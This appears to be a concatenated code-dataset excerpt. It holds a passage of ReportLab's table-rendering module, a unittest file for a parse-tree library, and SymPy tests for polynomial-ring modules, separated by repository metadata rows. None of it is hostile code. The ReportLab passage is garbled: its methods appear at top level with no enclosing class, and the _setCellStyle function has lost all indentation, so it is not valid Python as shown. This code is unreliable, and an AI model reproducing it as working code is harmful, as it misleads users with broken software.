        R1 = self.__class__(data[n:], colWidths=self._colWidths, rowHeights=self._argH[n:],
                repeatRows=repeatRows, repeatCols=repeatCols,
                splitByRow=splitByRow, normalizedData=1, cellStyles=self._cellStyles[n:],
                ident=ident,
                )
        R1._cr_1_0(n,A)
        R1._cr_1_0(n,self._bkgrndcmds)
        R1._cr_1_0(n,self._spanCmds)
        R1._cr_1_0(n,self._nosplitCmds)
    R0.hAlign = R1.hAlign = self.hAlign
    R0.vAlign = R1.vAlign = self.vAlign
    self.onSplit(R0)
    self.onSplit(R1)
    return [R0,R1]
def _getRowImpossible(impossible,cells,ranges):
    """Mark in *impossible* every row index where a split would cut through
    one of the multi-row *ranges* touched by *cells*.

    *ranges* maps (col,row) -> (col0,row0,col1,row1) or None; an entry is
    added as impossible[y] = None for each interior row y of a rowspan.
    """
    for xy in cells:
        r=ranges[xy]
        if r!=None:
            y1,y2=r[1],r[3]
            if y1!=y2:
                ymin=min(y1,y2) #normalize
                ymax=max(y1,y2) #normalize
                y=ymin+1
                while 1:
                    if y>ymax: break
                    impossible[y]=None #split at position y is impossible because of overlapping rowspan
                    y+=1
_getRowImpossible=staticmethod(_getRowImpossible)
def _getFirstPossibleSplitRowPosition(self,availHeight):
    """Return the largest row count that fits in *availHeight* without
    cutting through any SPAN or NOSPLIT region (0 if none fits)."""
    impossible={}
    # collect row indices where splitting is forbidden
    if self._spanCmds:
        self._getRowImpossible(impossible,self._rowSpanCells,self._spanRanges)
    if self._nosplitCmds:
        self._getRowImpossible(impossible,self._rowNoSplitCells,self._nosplitRanges)
    h = 0
    n = 1
    split_at = 0 # from this point of view 0 is the first position where the table may *always* be splitted
    for rh in self._rowHeights:
        if h+rh>availHeight:
            break
        if n not in impossible:
            split_at=n   # best allowed split seen so far
        h=h+rh
        n=n+1
    return split_at
def split(self, availWidth, availHeight):
    """Flowable protocol: split the table to fit *availHeight*.

    Returns [] (cannot split / too wide), [self], or two half-tables.
    Column-wise splitting is not implemented.
    """
    self._calc(availWidth, availHeight)
    if self.splitByRow:
        # refuse to split a table that is too wide for the frame
        if not rl_config.allowTableBoundsErrors and self._width>availWidth: return []
        return self._splitRows(availHeight)
    else:
        raise NotImplementedError
def draw(self):
    """Flowable protocol: paint backgrounds, cell contents, then lines."""
    self._curweight = self._curcolor = self._curcellstyle = None
    self._drawBkgrnd()
    if not self._spanCmds:
        # old fashioned case, no spanning, steam on and do each cell
        for row, rowstyle, rowpos, rowheight in zip(self._cellvalues, self._cellStyles, self._rowpositions[1:], self._rowHeights):
            for cellval, cellstyle, colpos, colwidth in zip(row, rowstyle, self._colpositions[:-1], self._colWidths):
                self._drawCell(cellval, cellstyle, (colpos, rowpos), (colwidth, rowheight))
    else:
        # we have some row or col spans, need a more complex algorithm
        # to find the rect for each
        for rowNo in range(self._nrows):
            for colNo in range(self._ncols):
                cellRect = self._spanRects[colNo, rowNo]
                if cellRect is not None:
                    # None means this cell was covered by another's span
                    (x, y, width, height) = cellRect
                    cellval = self._cellvalues[rowNo][colNo]
                    cellstyle = self._cellStyles[rowNo][colNo]
                    self._drawCell(cellval, cellstyle, (x, y), (width, height))
    self._drawLines()
def _drawBkgrnd(self):
    """Paint BACKGROUND / ROWBACKGROUNDS / COLBACKGROUNDS commands.

    A callable argument is invoked as arg(self, canv, x0, y0, w, h);
    otherwise the argument is a colour (or colour cycle) specification.
    """
    nrows = self._nrows
    ncols = self._ncols
    canv = self.canv
    colpositions = self._colpositions
    rowpositions = self._rowpositions
    rowHeights = self._rowHeights
    colWidths = self._colWidths
    spanRects = getattr(self,'_spanRects',None)
    for cmd, (sc, sr), (ec, er), arg in self._bkgrndcmds:
        # normalise negative cell indices
        if sc < 0: sc = sc + ncols
        if ec < 0: ec = ec + ncols
        if sr < 0: sr = sr + nrows
        if er < 0: er = er + nrows
        x0 = colpositions[sc]
        y0 = rowpositions[sr]
        x1 = colpositions[min(ec+1,ncols)]
        y1 = rowpositions[min(er+1,nrows)]
        w, h = x1-x0, y1-y0
        if hasattr(arg,'__call__'):
            # custom painter supplied instead of a colour
            arg(self,canv, x0, y0, w, h)
        elif cmd == 'ROWBACKGROUNDS':
            #Need a list of colors to cycle through. The arguments
            #might be already colours, or convertible to colors, or
            # None, or the str 'None'.
            #It's very common to alternate a pale shade with None.
            colorCycle = list(map(colors.toColorOrNone, arg))
            count = len(colorCycle)
            rowCount = er - sr + 1
            for i in range(rowCount):
                color = colorCycle[i%count]
                h = rowHeights[sr + i]
                if color:
                    canv.setFillColor(color)
                    canv.rect(x0, y0, w, -h, stroke=0,fill=1)
                y0 = y0 - h
        elif cmd == 'COLBACKGROUNDS':
            #cycle through colours columnwise
            colorCycle = list(map(colors.toColorOrNone, arg))
            count = len(colorCycle)
            colCount = ec - sc + 1
            for i in range(colCount):
                color = colorCycle[i%count]
                w = colWidths[sc + i]
                if color:
                    canv.setFillColor(color)
                    canv.rect(x0, y0, w, h, stroke=0,fill=1)
                x0 = x0 +w
        else: #cmd=='BACKGROUND'
            color = colors.toColorOrNone(arg)
            if color:
                if ec==sc and er==sr and spanRects:
                    # single cell: use the span rect so a spanned cell's
                    # background covers the whole spanned area
                    xywh = spanRects.get((sc,sr))
                    if xywh:
                        #it's a single cell
                        x0, y0, w, h = xywh
                canv.setFillColor(color)
                canv.rect(x0, y0, w, h, stroke=0,fill=1)
def _drawCell(self, cellval, cellstyle, pos, size):
    """Draw one cell's content at *pos* (lower-left) within *size*.

    Flowables (or lists of them) are laid out and drawn; anything else is
    rendered as text via str(), honouring the cell style's alignment,
    vertical alignment, font and padding.
    """
    colpos, rowpos = pos
    colwidth, rowheight = size
    if self._curcellstyle is not cellstyle:
        # only touch canvas state when the style actually changes
        cur = self._curcellstyle
        if cur is None or cellstyle.color != cur.color:
            self.canv.setFillColor(cellstyle.color)
        if cur is None or cellstyle.leading != cur.leading or cellstyle.fontname != cur.fontname or cellstyle.fontsize != cur.fontsize:
            self.canv.setFont(cellstyle.fontname, cellstyle.fontsize, cellstyle.leading)
        self._curcellstyle = cellstyle
    just = cellstyle.alignment
    valign = cellstyle.valign
    if isinstance(cellval,(tuple,list,Flowable)):
        if not isinstance(cellval,(tuple,list)): cellval = (cellval,)
        # we assume it's a list of Flowables
        W = []
        H = []
        w, h = self._listCellGeom(cellval,colwidth,cellstyle,W=W, H=H,aH=rowheight)
        if valign=='TOP':
            y = rowpos + rowheight - cellstyle.topPadding
        elif valign=='BOTTOM':
            y = rowpos+cellstyle.bottomPadding + h
        else:
            y = rowpos+(rowheight+cellstyle.bottomPadding-cellstyle.topPadding+h)/2.0
        if cellval: y += cellval[0].getSpaceBefore()
        for v, w, h in zip(cellval,W,H):
            if just=='LEFT': x = colpos+cellstyle.leftPadding
            elif just=='RIGHT': x = colpos+colwidth-cellstyle.rightPadding - w
            elif just in ('CENTRE', 'CENTER'):
                x = colpos+(colwidth+cellstyle.leftPadding-cellstyle.rightPadding-w)/2.0
            else:
                raise ValueError('Invalid justification %s' % just)
            y -= v.getSpaceBefore()
            y -= h
            v.drawOn(self.canv,x,y)
            y -= v.getSpaceAfter()
    else:
        # plain text: choose the canvas primitive matching the alignment
        if just == 'LEFT':
            draw = self.canv.drawString
            x = colpos + cellstyle.leftPadding
        elif just in ('CENTRE', 'CENTER'):
            draw = self.canv.drawCentredString
            x = colpos+(colwidth+cellstyle.leftPadding-cellstyle.rightPadding)*0.5
        elif just == 'RIGHT':
            draw = self.canv.drawRightString
            x = colpos + colwidth - cellstyle.rightPadding
        elif just == 'DECIMAL':
            draw = self.canv.drawAlignedString
            x = colpos + colwidth - cellstyle.rightPadding
        else:
            raise ValueError('Invalid justification %s' % just)
        vals = str(cellval).split("\n")
        n = len(vals)
        leading = cellstyle.leading
        fontsize = cellstyle.fontsize
        if valign=='BOTTOM':
            y = rowpos + cellstyle.bottomPadding+n*leading-fontsize
        elif valign=='TOP':
            y = rowpos + rowheight - cellstyle.topPadding - fontsize
        elif valign=='MIDDLE':
            #tim roberts pointed out missing fontsize correction 2004-10-04
            y = rowpos + (cellstyle.bottomPadding + rowheight-cellstyle.topPadding+n*leading)/2.0 - fontsize
        else:
            raise ValueError("Bad valign: '%s'" % str(valign))
        for v in vals:
            draw(x, y, v)
            y -= leading
        onDraw = getattr(cellval,'onDraw',None)
        if onDraw:
            onDraw(self.canv,cellval.kind,cellval.label)
    if cellstyle.href:
        #external hyperlink over the whole cell rectangle
        self.canv.linkURL(cellstyle.href, (colpos, rowpos, colpos + colwidth, rowpos + rowheight), relative=1)
    if cellstyle.destination:
        #internal link to a named destination in this document
        self.canv.linkRect("", cellstyle.destination, Rect=(colpos, rowpos, colpos + colwidth, rowpos + rowheight), relative=1)
# Maps each line-command name to the drawing-method name used by _drawLines.
_LineOpMap = { 'GRID':'_drawGrid',
               'BOX':'_drawBox',
               'OUTLINE':'_drawBox',
               'INNERGRID':'_drawInnerGrid',
               'LINEBELOW':'_drawHLinesB',
               'LINEABOVE':'_drawHLines',
               'LINEBEFORE':'_drawVLines',
               'LINEAFTER':'_drawVLinesA', }
class LongTable(Table):
    '''Henning von Bargen's changes will be active'''
    # enables the per-height caching optimisation for very tall tables
    _longTableOptimize = 1
# All command names treated as line-drawing commands by _isLineCommand.
LINECOMMANDS = list(_LineOpMap.keys())
def _isLineCommand(cmd):
    """Return True when *cmd* is one of the line-drawing table commands."""
    op = cmd[0]
    return op in LINECOMMANDS
def _setCellStyle(cellStyles, i, j, op, values):
#new = CellStyle('<%d, %d>' % (i,j), cellStyles[i][j])
#cellStyles[i][j] = new
## modify in place!!!
new = cellStyles[i][j]
if op == 'FONT':
n = len(values)
new.fontname = values[0]
if n>1:
new.fontsize = values[1]
if n>2:
new.leading = values[2]
else:
new.leading = new.fontsize*1.2
elif op in ('FONTNAME', 'FACE'):
new.fontname = values[0]
elif op in ('SIZE', 'FONTSIZE'):
new.fontsize = values[0]
elif op == 'LEADING':
new.leading = values[0]
elif op == 'TEXTCOLOR':
new.color = colors.toColor(values[0], colors.Color(0,0,0))
elif op in ('ALIGN', 'ALIGNMENT'):
new.alignment = values[0]
elif op == 'VALIGN':
new.valign = values[0]
elif op == 'LEFTPADDING':
new.leftPadding = values[0]
elif op == 'RIGHTPADDING':
new.rightPadding = values[0]
elif op == 'TOPPADDING':
new.topPadding = values[0]
elif op == 'BOTTOMPADDING':
new.bottomPadding = values[0]
elif op == 'HREF':
new.href = values[0]
elif op == 'DESTINATION':
new.destination = values[0]
# Canned TableStyles kept for convenience/backwards compatibility; all of
# them right-align the body region (everything except row 0 / column 0).
GRID_STYLE = TableStyle(
    [('GRID', (0,0), (-1,-1), 0.25, colors.black),
     ('ALIGN', (1,1), (-1,-1), 'RIGHT')]
    )
BOX_STYLE = TableStyle(
    [('BOX', (0,0), (-1,-1), 0.50, colors.black),
     ('ALIGN', (1,1), (-1,-1), 'RIGHT')]
    )
# grid with heavy outer box and rules after the label row/column
LABELED_GRID_STYLE = TableStyle(
    [('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
     ('BOX', (0,0), (-1,-1), 2, colors.black),
     ('LINEBELOW', (0,0), (-1,0), 2, colors.black),
     ('LINEAFTER', (0,0), (0,-1), 2, colors.black),
     ('ALIGN', (1,1), (-1,-1), 'RIGHT')]
    )
COLORED_GRID_STYLE = TableStyle(
    [('INNERGRID', (0,0), (-1,-1), 0.25, colors.black),
     ('BOX', (0,0), (-1,-1), 2, colors.red),
     ('LINEBELOW', (0,0), (-1,0), 2, colors.black),
     ('LINEAFTER', (0,0), (0,-1), 2, colors.black),
     ('ALIGN', (1,1), (-1,-1), 'RIGHT')]
    )
# horizontal rules only - suitable for simple lists
LIST_STYLE = TableStyle(
    [('LINEABOVE', (0,0), (-1,0), 2, colors.green),
     ('LINEABOVE', (0,1), (-1,-1), 0.25, colors.black),
     ('LINEBELOW', (0,-1), (-1,-1), 2, colors.green),
     ('ALIGN', (1,1), (-1,-1), 'RIGHT')]
    )
# experimental iterator which can apply a sequence
# of colors e.g. Blue, None, Blue, None as you move
# down.
# Run the legacy table demo/tests when this module is executed directly.
if __name__ == '__main__':
    from tests.test_platypus_tables import old_tables_test
    old_tables_test()
| 41.034098
| 202
| 0.523101
|
4a0a2a16488fbcb23d6421199f8d56bd38298ee4
| 4,015
|
py
|
Python
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 6
|
2017-06-05T08:58:55.000Z
|
2020-11-22T13:49:34.000Z
|
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | null | null | null |
src/tree_dict_test.py
|
yaricom/english-article-correction
|
e48e9af2d86e20ee0a3d091a5340a8669302c36a
|
[
"MIT"
] | 2
|
2017-04-24T08:19:06.000Z
|
2020-12-16T08:42:09.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The tests for tree implementation
@author: yaric
"""
import unittest
import tree_dict as td
import config
import utils
class TestDeepTreeMethods(unittest.TestCase):
    """Exercises tree_dict operations against a deep parse tree (sample #1)."""

    @classmethod
    def setUpClass(cls):
        parse_data = utils.read_json(config.parse_train_path)
        cls.root, _ = td.treeFromJSON(parse_data[1])

    def test_walk(self):
        node_count = sum(1 for _ in td.walk(self.root))
        self.assertEqual(node_count, 125, "Nodes in the ROOT")

    def test_leaves(self):
        self.assertEqual(len(self.root.leaves()), 43, "Leaves in the ROOT")

    def test_leaves_s_indexes(self):
        leaves = self.root.leaves()
        self.assertEqual(len(leaves), 43, "Leaves in the ROOT")
        # sentence indices must run 0..len-1 in leaf order
        for expected, leaf in enumerate(leaves):
            self.assertEqual(leaf.s_index, expected, "Index of leaf")

    def test_subtrees(self):
        self.assertEqual(len(self.root.subtrees()), 82,
                         "Subtrees in the ROOT [min_childs = 1]")
        self.assertEqual(len(self.root.subtrees(min_childs=2)), 28,
                         "Subtrees in the ROOT [min_childs = 2]")

    def test_np_subtrees(self):
        np_count = sum(1 for st in self.root.subtrees() if st.name == 'NP')
        self.assertEqual(np_count, 13, "NP Subtrees in the ROOT")

    def test_deepNPSubtrees(self):
        self.assertEqual(len(self.root.deepNPSubtrees()), 11,
                         "Deep NP Subtrees in the ROOT")

    def test_leaves_with_pos(self):
        self.assertEqual(len(self.root.leavesWithPOS('DT')), 3,
                         "Leaves with POS 'DT' in the ROOT")

    def test_dpaSubtrees(self):
        self.assertEqual(len(self.root.dpaSubtrees()), 3,
                         "DPA Subtrees in the ROOT")
class TestShallowTreeMethods(unittest.TestCase):
    """Exercises tree_dict operations against a shallow parse tree (sample #723)."""

    @classmethod
    def setUpClass(cls):
        parse_data = utils.read_json(config.parse_train_path)
        cls.root, _ = td.treeFromJSON(parse_data[723])

    def test_walk(self):
        node_count = sum(1 for _ in td.walk(self.root))
        self.assertEqual(node_count, 33, "Nodes in the ROOT")

    def test_leaves(self):
        self.assertEqual(len(self.root.leaves()), 14, "Leaves in the ROOT")

    def test_leaves_s_indexes(self):
        leaves = self.root.leaves()
        self.assertEqual(len(leaves), 14, "Leaves in the ROOT")
        # sentence indices must run 0..len-1 in leaf order
        for expected, leaf in enumerate(leaves):
            self.assertEqual(leaf.s_index, expected, "Index of leaf")

    def test_subtrees(self):
        self.assertEqual(len(self.root.subtrees()), 19,
                         "Subtrees in the ROOT [min_childs = 1]")
        self.assertEqual(len(self.root.subtrees(min_childs=2)), 2,
                         "Subtrees in the ROOT [min_childs = 2]")

    def test_np_subtrees(self):
        np_count = sum(1 for st in self.root.subtrees() if st.name == 'NP')
        self.assertEqual(np_count, 4, "NP Subtrees in the ROOT")

    def test_deepNPSubtrees(self):
        self.assertEqual(len(self.root.deepNPSubtrees()), 4,
                         "Deep NP Subtrees in the ROOT")

    def test_leaves_with_pos(self):
        self.assertEqual(len(self.root.leavesWithPOS('DT')), 1,
                         "Leaves with POS 'DT' in the ROOT")

    def test_dpaSubtrees(self):
        self.assertEqual(len(self.root.dpaSubtrees()), 0,
                         "DPA Subtrees in the ROOT")
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| 32.12
| 84
| 0.596015
|
4a0a2ac4bf5a2b725453d1fcdc6482980c4016d7
| 12,988
|
py
|
Python
|
sympy/polys/agca/tests/test_modules.py
|
sn6uv/sympy
|
5b149c2f72847e4785c65358b09d99b29f101dd5
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/polys/agca/tests/test_modules.py
|
sn6uv/sympy
|
5b149c2f72847e4785c65358b09d99b29f101dd5
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/polys/agca/tests/test_modules.py
|
sn6uv/sympy
|
5b149c2f72847e4785c65358b09d99b29f101dd5
|
[
"BSD-3-Clause"
] | null | null | null |
"""Test modules.py code."""
from sympy.polys.agca.modules import FreeModule, ModuleOrder, FreeModulePolyRing
from sympy.polys import CoercionFailed, QQ, lex, grlex, ilex, ZZ
from sympy.abc import x, y, z
from sympy.utilities.pytest import raises
from sympy import S
def test_FreeModuleElement():
    """Element construction, indexing and arithmetic in QQ[x]**3."""
    M = QQ[x].free_module(3)
    e = M.convert([1, x, x**2])
    f = [QQ[x].convert(1), QQ[x].convert(x), QQ[x].convert(x**2)]
    assert list(e) == f
    assert f[0] == e[0]
    assert f[1] == e[1]
    assert f[2] == e[2]
    raises(IndexError, lambda: e[3])
    g = M.convert([x, 0, 0])
    assert e + g == M.convert([x + 1, x, x**2])
    assert f + g == M.convert([x + 1, x, x**2])
    assert -e == M.convert([-1, -x, -x**2])
    assert e - g == M.convert([1 - x, x, x**2])
    assert e != g
    assert M.convert([x, x, x]) / QQ[x].convert(x) == [1, 1, 1]
    # division also works over a local (ilex-ordered) ring
    R = QQ.poly_ring(x, order="ilex")
    assert R.free_module(1).convert([x]) / R.convert(x) == [1]
def test_FreeModule():
    """FreeModule equality, membership and scalar operations over global
    and local (ilex) polynomial rings."""
    M1 = FreeModule(QQ[x], 2)
    assert M1 == FreeModule(QQ[x], 2)
    assert M1 != FreeModule(QQ[y], 2)
    assert M1 != FreeModule(QQ[x], 3)
    M2 = FreeModule(QQ.poly_ring(x, order="ilex"), 2)
    # membership in the global-ring module
    assert [x, 1] in M1
    assert [x] not in M1
    assert [2, y] not in M1
    assert [1/(x + 1), 2] not in M1
    e = M1.convert([x, x**2 + 1])
    X = QQ[x].convert(x)
    assert e == [X, X**2 + 1]
    assert e == [x, x**2 + 1]
    assert 2*e == [2*x, 2*x**2 + 2]
    assert e*2 == [2*x, 2*x**2 + 2]
    assert e/2 == [x/2, (x**2 + 1)/2]
    assert x*e == [x**2, x**3 + x]
    assert e*x == [x**2, x**3 + x]
    assert X*e == [x**2, x**3 + x]
    assert e*X == [x**2, x**3 + x]
    # local ring admits denominators that are units at the origin
    assert [x, 1] in M2
    assert [x] not in M2
    assert [2, y] not in M2
    assert [1/(x + 1), 2] in M2
    e = M2.convert([x, x**2 + 1])
    X = QQ.poly_ring(x, order="ilex").convert(x)
    assert e == [X, X**2 + 1]
    assert e == [x, x**2 + 1]
    assert 2*e == [2*x, 2*x**2 + 2]
    assert e*2 == [2*x, 2*x**2 + 2]
    assert e/2 == [x/2, (x**2 + 1)/2]
    assert x*e == [x**2, x**3 + x]
    assert e*x == [x**2, x**3 + x]
    assert e/(1 + x) == [x/(1 + x), (x**2 + 1)/(1 + x)]
    assert X*e == [x**2, x**3 + x]
    assert e*X == [x**2, x**3 + x]
    M3 = FreeModule(QQ[x, y], 2)
    assert M3.convert(e) == M3.convert([x, x**2 + 1])
    assert not M3.is_submodule(0)
    assert not M3.is_zero()
    # unsupported base rings / bad conversions must raise
    raises(NotImplementedError, lambda: ZZ[x].free_module(2))
    raises(NotImplementedError, lambda: FreeModulePolyRing(ZZ, 2))
    raises(CoercionFailed, lambda: M1.convert(QQ[x].free_module(3).convert([1, 2, 3])))
    raises(CoercionFailed, lambda: M3.convert(1))
def test_ModuleOrder():
    """Equality and key generation of ModuleOrder (TOP/position orders)."""
    o1 = ModuleOrder(lex, grlex, False)
    o2 = ModuleOrder(ilex, lex, False)
    assert o1 == ModuleOrder(lex, grlex, False)
    assert (o1 != ModuleOrder(lex, grlex, False)) is False
    assert o1 != o2
    # key: component index first, then the monomial order applied to the rest
    assert o1((1, 2, 3)) == (1, (5, (2, 3)))
    assert o2((1, 2, 3)) == (-1, (2, 3))
def test_SubModulePolyRing_global():
    """Submodule equality, containment and unions over a global order."""
    R = QQ[x, y]
    F = R.free_module(3)
    Fd = F.submodule([1, 0, 0], [1, 2, 0], [1, 2, 3])   # full module, other generators
    M = F.submodule([x**2 + y**2, 1, 0], [x, y, 1])
    assert F == Fd
    assert Fd == F
    assert F != M
    assert M != F
    assert Fd != M
    assert M != Fd
    assert Fd == F.submodule(*F.basis())
    assert Fd.is_full_module()
    assert not M.is_full_module()
    assert not Fd.is_zero()
    assert not M.is_zero()
    assert Fd.submodule().is_zero()
    assert M.contains([x**2 + y**2 + x, 1 + y, 1])
    assert not M.contains([x**2 + y**2 + x, 1 + y, 2])
    assert M.contains([y**2, 1 - x*y, -x])
    # 1 + x is not a unit globally, so these generate different submodules
    assert not F.submodule([1 + x, 0, 0]) == F.submodule([1, 0, 0])
    assert F.submodule([1, 0, 0], [0, 1, 0]).union(F.submodule([0, 0, 1])) == F
    assert not M.is_submodule(0)
    m = F.convert([x**2 + y**2, 1, 0])
    n = M.convert(m)
    assert m.module is F
    assert n.module is M
    raises(ValueError, lambda: M.submodule([1, 0, 0]))
    raises(TypeError, lambda: M.union(1))
    raises(ValueError, lambda: M.union(R.free_module(1).submodule([x])))
    # order is part of a submodule's identity
    assert F.submodule([x, x, x]) != F.submodule([x, x, x], order="ilex")
def test_SubModulePolyRing_local():
    """Same submodule operations over a local (ilex) order, where
    polynomials with nonzero constant term are units."""
    R = QQ.poly_ring(x, y, order=ilex)
    F = R.free_module(3)
    Fd = F.submodule([1+x, 0, 0], [1+y, 2+2*y, 0], [1, 2, 3])
    M = F.submodule([x**2 + y**2, 1, 0], [x, y, 1])
    assert F == Fd
    assert Fd == F
    assert F != M
    assert M != F
    assert Fd != M
    assert M != Fd
    assert Fd == F.submodule(*F.basis())
    assert Fd.is_full_module()
    assert not M.is_full_module()
    assert not Fd.is_zero()
    assert not M.is_zero()
    assert Fd.submodule().is_zero()
    assert M.contains([x**2 + y**2 + x, 1 + y, 1])
    assert not M.contains([x**2 + y**2 + x, 1 + y, 2])
    assert M.contains([y**2, 1 - x*y, -x])
    # 1 + x IS a unit locally, so these agree (contrast with the global test)
    assert F.submodule([1 + x, 0, 0]) == F.submodule([1, 0, 0])
    assert F.submodule([1, 0, 0], [0, 1, 0]).union(F.submodule([0, 0, 1 + x*y])) == F
    raises(ValueError, lambda: M.submodule([1, 0, 0]))
def test_SubModulePolyRing_nontriv_global():
    """Nontrivial ideal-membership (containment) checks over QQ[x, y, z]."""
    R = QQ[x, y, z]
    F = R.free_module(1)

    def contains(I, f):
        # membership of f in the ideal generated by I, via rank-1 submodules
        return F.submodule(*[[g] for g in I]).contains([f])

    assert contains([x, y], x)
    assert contains([x, y], x + y)
    assert not contains([x, y], 1)
    assert not contains([x, y], z)
    assert contains([x**2 + y, x**2 + x], x - y)
    # elementary symmetric polynomials: power sums enter at degree 3
    assert not contains([x+y+z, x*y+x*z+y*z, x*y*z], x**2)
    assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x**3)
    assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x**4)
    assert not contains([x+y+z, x*y+x*z+y*z, x*y*z], x*y**2)
    assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x**4 + y**3 + 2*z*y*x)
    assert contains([x+y+z, x*y+x*z+y*z, x*y*z], x*y*z)
    assert contains([x, 1+x+y, 5-7*y], 1)
    assert contains([x**3+y**3, y**3+z**3, z**3+x**3, x**2*y + x**2*z + y**2*z],
                    x**3)
    assert not contains([x**3+y**3, y**3+z**3, z**3+x**3, x**2*y + x**2*z + y**2*z],
                        x**2 + y**2)
    # compare local order (these DO hold in the local test below)
    assert not contains([x*(1+x+y), y*(1+z)], x)
    assert not contains([x*(1+x+y), y*(1+z)], x + y)
def test_SubModulePolyRing_nontriv_local():
R = QQ.poly_ring(x, y, z, order=ilex)
F = R.free_module(1)
def contains(I, f):
return F.submodule(*[[g] for g in I]).contains([f])
assert contains([x, y], x)
assert contains([x, y], x + y)
assert not contains([x, y], 1)
assert not contains([x, y], z)
assert contains([x**2 + y, x**2 + x], x - y)
assert not contains([x+y+z, x*y+x*z+y*z, x*y*z], x**2)
assert contains([x*(1+x+y), y*(1+z)], x)
assert contains([x*(1+x+y), y*(1+z)], x + y)
def test_syzygy():
R = QQ[x, y, z]
M = R.free_module(1).submodule([x*y], [y*z], [x*z])
S = R.free_module(3).submodule([0, x, -y], [z, -x, 0])
assert M.syzygy_module() == S
M2 = M / ([x*y*z],)
S2 = R.free_module(3).submodule([z, 0, 0], [0, x, 0], [0, 0, y])
assert M2.syzygy_module() == S2
F = R.free_module(3)
assert F.submodule(*F.basis()).syzygy_module() == F.submodule()
R2 = QQ[x, y, z] / [x*y*z]
M3 = R2.free_module(1).submodule([x*y], [y*z], [x*z])
S3 = R2.free_module(3).submodule([z, 0, 0], [0, x, 0], [0, 0, y])
assert M3.syzygy_module() == S3
def test_in_terms_of_generators():
R = QQ.poly_ring(x, order="ilex")
M = R.free_module(2).submodule([2*x, 0], [1, 2])
assert M.in_terms_of_generators([x, x]) == [R.convert(S(1)/4), R.convert(x/2)]
raises(ValueError, lambda: M.in_terms_of_generators([1, 0]))
M = R.free_module(2) / ([x, 0], [1, 1])
SM = M.submodule([1, x])
assert SM.in_terms_of_generators([2, 0]) == [R.convert(-2/(x - 1))]
R = QQ[x, y] / [x**2 - y**2]
M = R.free_module(2)
SM = M.submodule([x, 0], [0, y])
assert SM.in_terms_of_generators([x**2, x**2]) == [R.convert(x), R.convert(y)]
def test_QuotientModuleElement():
R = QQ[x]
F = R.free_module(3)
N = F.submodule([1, x, x**2])
M = F/N
e = M.convert([x**2, 2, 0])
assert M.convert([x+1, x**2+x, x**3+x**2]) == 0
assert e == [x**2, 2, 0] + N == F.convert([x**2, 2, 0]) + N == \
M.convert(F.convert([x**2, 2, 0]))
assert M.convert([x**2 + 1, 2*x + 2, x**2]) == e + [0, x, 0] == \
e + M.convert([0, x, 0]) == e + F.convert([0, x, 0])
assert M.convert([x**2 + 1, 2, x**2]) == e - [0, x, 0] == \
e - M.convert([0, x, 0]) == e - F.convert([0, x, 0])
assert M.convert([0, 2, 0]) == M.convert([x**2, 4, 0]) - e == \
[x**2, 4, 0] - e == F.convert([x**2, 4, 0]) - e
assert M.convert([x**3 + x**2, 2*x + 2, 0]) == (1 + x)*e == \
R.convert(1 + x)*e == e*(1 + x) == e*R.convert(1 + x)
assert -e == [-x**2, -2, 0]
f = [x, x, 0] + N
assert M.convert([1, 1, 0]) == f / x == f / R.convert(x)
M2 = F/[(2, 2*x, 2*x**2), (0, 0, 1)]
G = R.free_module(2)
M3 = G/[[1, x]]
M4 = F.submodule([1, x, x**2], [1, 0, 0]) / N
raises(CoercionFailed, lambda: M.convert(G.convert([1, x])))
raises(CoercionFailed, lambda: M.convert(M3.convert([1, x])))
raises(CoercionFailed, lambda: M.convert(M2.convert([1, x, x])))
assert M2.convert(M.convert([2, x, x**2])) == [2, x, 0]
assert M.convert(M4.convert([2, 0, 0])) == [2, 0, 0]
def test_QuotientModule():
R = QQ[x]
F = R.free_module(3)
N = F.submodule([1, x, x**2])
M = F/N
assert M != F
assert M != N
assert M == F / [(1, x, x**2)]
assert not M.is_zero()
assert (F / F.basis()).is_zero()
SQ = F.submodule([1, x, x**2], [2, 0, 0]) / N
assert SQ == M.submodule([2, x, x**2])
assert SQ != M.submodule([2, 1, 0])
assert SQ != M
assert M.is_submodule(SQ)
assert not SQ.is_full_module()
raises(ValueError, lambda: N/F)
raises(ValueError, lambda: F.submodule([2, 0, 0]) / N)
raises(ValueError, lambda: R.free_module(2)/F)
raises(CoercionFailed, lambda: F.convert(M.convert([1, x, x**2])))
M1 = F / [[1, 1, 1]]
M2 = M1.submodule([1, 0, 0], [0, 1, 0])
assert M1 == M2
def test_ModulesQuotientRing():
R = QQ.poly_ring(x, y, order=(("lex", x), ("ilex", y))) / [x**2 + 1]
M1 = R.free_module(2)
assert M1 == R.free_module(2)
assert M1 != QQ[x].free_module(2)
assert M1 != R.free_module(3)
assert [x, 1] in M1
assert [x] not in M1
assert [1/(R.convert(x) + 1), 2] in M1
assert [1, 2/(1 + y)] in M1
assert [1, 2/y] not in M1
assert M1.convert([x**2, y]) == [-1, y]
F = R.free_module(3)
Fd = F.submodule([x**2, 0, 0], [1, 2, 0], [1, 2, 3])
M = F.submodule([x**2 + y**2, 1, 0], [x, y, 1])
assert F == Fd
assert Fd == F
assert F != M
assert M != F
assert Fd != M
assert M != Fd
assert Fd == F.submodule(*F.basis())
assert Fd.is_full_module()
assert not M.is_full_module()
assert not Fd.is_zero()
assert not M.is_zero()
assert Fd.submodule().is_zero()
assert M.contains([x**2 + y**2 + x, -x**2 + y, 1])
assert not M.contains([x**2 + y**2 + x, 1 + y, 2])
assert M.contains([y**2, 1 - x*y, -x])
assert F.submodule([x, 0, 0]) == F.submodule([1, 0, 0])
assert not F.submodule([y, 0, 0]) == F.submodule([1, 0, 0])
assert F.submodule([1, 0, 0], [0, 1, 0]).union(F.submodule([0, 0, 1])) == F
assert not M.is_submodule(0)
def test_module_mul():
R = QQ[x]
M = R.free_module(2)
S1 = M.submodule([x, 0], [0, x])
S2 = M.submodule([x**2, 0], [0, x**2])
I = R.ideal(x)
assert I*M == M*I == S1 == x*M == M*x
assert I*S1 == S2 == x*S1
